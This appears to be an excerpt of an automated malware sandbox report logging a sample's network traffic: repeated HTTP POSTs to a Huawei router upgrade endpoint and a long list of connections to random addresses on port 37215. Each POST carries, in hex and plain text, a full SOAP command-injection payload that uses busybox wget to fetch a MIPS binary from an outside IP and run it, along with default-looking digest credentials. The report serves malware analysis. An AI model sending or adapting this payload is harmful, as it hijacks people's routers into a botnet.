6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.88.204.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.78.56.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.63.127.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.27.169.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.99.21.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.249.91.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.203.69.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.123.230.191:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.175.90.116:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.65.10.120:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.248.129.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.68.195.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.84.219.122:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.169.75.102:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.227.70.241:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.224.113.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.52.101.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.132.5.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.221.247.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.229.64.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.138.73.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.161.228.29:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.130.10.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.174.12.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.176.189.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.122.41.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.229.47.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.151.165.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.8.123.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.88.135.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.247.14.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.121.238.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.179.88.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.73.98.82:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.234.64.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.179.127.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.34.162.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.27.123.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.189.131.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.149.164.1:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.11.158.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.104.86.199:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.50.29.120:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.115.29.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.229.178.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.52.117.9:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.90.118.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.76.128.80:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.47.61.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.226.2.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.61.177.32:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.234.211.94:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.214.92.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.237.196.136:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.110.149.99:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.107.27.188:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.190.76.219:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.53.0.22:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.75.54.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.108.155.116:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.99.112.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.1.33.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.175.244.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.41.37.71:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.36.95.251:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.47.62.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.102.188.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.54.72.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.133.229.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.79.52.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.232.89.77:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.60.127.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.232.70.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.146.98.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.98.53.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.159.63.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.119.88.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.123.30.181:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.166.11.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.155.163.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.176.64.160:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.103.227.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.83.209.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.166.220.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.217.101.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.158.113.66:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.251.75.7:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.73.161.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.44.212.43:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.160.26.232:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.110.237.42:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.250.167.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.102.39.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.135.51.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.116.191.155:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.241.105.50:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.110.23.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.47.87.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.35.63.125:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.146.248.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.163.13.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.99.238.172:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.148.177.146:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.61.132.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.113.128.61:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.199.134.142:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.189.25.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.178.144.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.240.138.186:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.217.199.136:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.18.238.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.71.160.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.121.56.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.47.221.57:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.21.78.138:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.101.216.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.60.220.21:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.19.27.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.183.168.99:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.185.22.34:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.190.236.96:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.121.242.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.53.138.68:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.148.48.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.160.81.45:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.96.209.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.73.211.104:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.186.11.102:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.44.70.229:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.8.187.72:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.112.91.169:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.131.169.80:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.65.87.215:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.230.171.130:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.11.133.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.173.23.68:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.241.145.193:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.210.148.252:37215
